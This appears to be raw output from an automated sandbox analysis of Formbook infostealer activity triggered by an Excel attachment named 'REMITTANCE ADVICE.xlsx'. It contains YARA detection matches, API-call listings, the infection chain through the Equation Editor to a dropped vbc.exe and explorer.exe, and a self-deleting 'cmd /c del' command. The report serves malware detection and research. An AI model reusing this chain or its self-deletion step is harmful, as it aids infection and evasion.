          Source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00406043
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00404618
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040681A
Source: C:\Users\Public\vbc.exe | Code function: 4_2_10012610
Source: C:\Users\Public\vbc.exe | Code function: 4_2_1000C4AF
Source: C:\Users\Public\vbc.exe | Code function: 4_2_1000C8C7
Source: C:\Users\Public\vbc.exe | Code function: 4_2_100130F4
Source: C:\Users\Public\vbc.exe | Code function: 4_2_100154FD
Source: C:\Users\Public\vbc.exe | Code function: 4_2_1000CCFC
Source: C:\Users\Public\vbc.exe | Code function: 4_2_1000D131
Source: C:\Users\Public\vbc.exe | Code function: 4_2_1001453C
Source: C:\Users\Public\vbc.exe | Code function: 4_2_1001174A
Source: C:\Users\Public\vbc.exe | Code function: 4_2_10012B82
Source: C:\Users\Public\vbc.exe | Code function: 4_2_1000BFBB
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00401030
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C957
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041D16A
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00401174
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041BA0C
Source: C:\Users\Public\vbc.exe | Code function: 5_2_004012FB
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041BC66
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00408C7B
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00408C80
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00402D90
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C5A7
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C6C2
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00402FB0
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007BD06D
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075905A
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00743040
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0076D005
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0073E0C6
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007E1238
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0073E2E9
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0078A37B
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00747353
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00742305
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007663DB
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0073F3CF
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007E63BF
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0077D47D
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007C443E
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00775485
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00751489
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00786540
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0074351F
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075C5F0
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007C05E3
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0078A634
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007E2622
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0074E6C1
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00744680
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007757C3
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0074C7BC
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007C579A
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0076286D
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0074C85C
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007DF8EE
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007BF8C4
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007C5955
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007C394B
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007569FE
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007429B2
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007E098E
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007F3A83
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00767B00
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0073FBD7
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007CDBDA
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007C6BCB
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007ECBA4
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0074CD5B
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00770D3B
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007DFDDD
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075EE4C
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00772E2F
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0076DF7C
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00750F3F
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007B2FDC
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007DCFB1
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00401030
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041D16A
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00401174
Source: C:\Users\Public\vbc.exe | Code function: 5_1_004012FB
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041C5A7
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041C6C2
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041C957
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041BA0C
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041BC66
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00408C7B
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00408C80
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00402D90
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00402FB0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027BE2E9
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02861238
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027C7353
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_028663BF
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027C2305
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027E63DB
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027BF3CF
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0280A37B
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027D905A
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027C3040
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027ED005
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027BE0C6
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02862622
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0280A634
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027CE6C1
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027C4680
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0284579A
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027F57C3
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027CC7BC
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027FD47D
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027D1489
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027F5485
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027C351F
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027DC5F0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02806540
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02873A83
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0286CBA4
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0284DBDA
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027E7B00
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027BFBD7
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027E286D
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027CC85C
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0285F8EE
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0286098E
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027D69FE
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027C29B2
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0284394B
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02845955
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027DEE4C
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027F2E2F
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027EDF7C
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0285CFB1
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027D0F3F
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027CCD5B
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027F0D3B
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0285FDDD
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0009D16A
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0009C5A7
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0009C6C2
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0009C957
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0009BA0C
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0009BC66
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_00088C7B
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_00088C80
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_00082D90
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_00082FB0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 0280373B appears 244 times
Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 02803F92 appears 132 times
Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 027BDF5C appears 119 times
Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 027BE2A8 appears 38 times
Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 0282F970 appears 84 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 007AF970 appears 84 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 0078373B appears 245 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 0073E2A8 appears 41 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 00783F92 appears 132 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 0041A4C0 appears 38 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 0073DF5C appears 123 times
Source: C:\Users\Public\vbc.exe | Code function: 5_2_004185E0 NtCreateFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00418690 NtReadFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00418710 NtClose,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_004187C0 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_004185DA NtCreateFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041868A NtReadFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00418714 NtClose,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_004187BA NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00730078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007300C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007307AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072F900 NtReadFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072F9F0 NtClose,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00730060 NtQuerySection,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007310D0 NtOpenProcessToken,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00731148 NtOpenThread,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0073010C NtOpenDirectoryObject,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007301D4 NtSetValueKey,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072F8CC NtWaitForSingleObject,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00731930 NtSetContextThread,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072F938 NtWriteFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FA50 NtEnumerateValueKey,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FA20 NtQueryInformationFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FAB8 NtQueryValueKey,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FB50 NtCreateKey,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FBE8 NtQueryVirtualMemory,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00730C40 NtGetContextThread,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FC48 NtSetInformationFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FC30 NtOpenProcess,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FD5C NtEnumerateKey,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00731D80 NtSuspendThread,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FE24 NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FF34 NtQueueApcThread,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FFFC NtCreateProcessEx,
Source: C:\Users\Public\vbc.exe | Code function: 5_1_004185E0 NtCreateFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00418690 NtReadFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00418710 NtClose,
Source: C:\Users\Public\vbc.exe | Code function: 5_1_004187C0 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe | Code function: 5_1_004185DA NtCreateFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041868A NtReadFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00418714 NtClose,
Source: C:\Users\Public\vbc.exe | Code function: 5_1_004187BA NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027B00C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027B07AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFAB8 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFB50 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AF900 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AF9F0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027B0078 NtResumeThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027B0060 NtQuerySection,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027B0048 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027B10D0 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027B1148 NtOpenThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027B010C NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027B01D4 NtSetValueKey,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFA50 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFA20 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFBE8 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AF8CC NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AF938 NtWriteFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027B1930 NtSetContextThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFEA0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFFFC NtCreateProcessEx,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFC48 NtSetInformationFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027B0C40 NtGetContextThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFC30 NtOpenProcess,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027AFD5C NtEnumerateKey,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027B1D80 NtSuspendThread,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_000985E0 NtCreateFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_00098690 NtReadFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_00098710 NtClose,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_000987C0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_000985DA NtCreateFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0009868A NtReadFile,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_00098714 NtClose,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_000987BA NtAllocateVirtualMemory,
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsvE542.tmp\otav.dll B6A12BC611F92D3D793CE5C3C9CFF8A906CA96BD6B1D5C0DA8EBF9080FF4428A
Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 76E90000 page execute and read and write
Source: REMITTANCE ADVICE.xlsx | Virustotal: Detection: 35%
Source: REMITTANCE ADVICE.xlsx | ReversingLabs: Detection: 43%
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
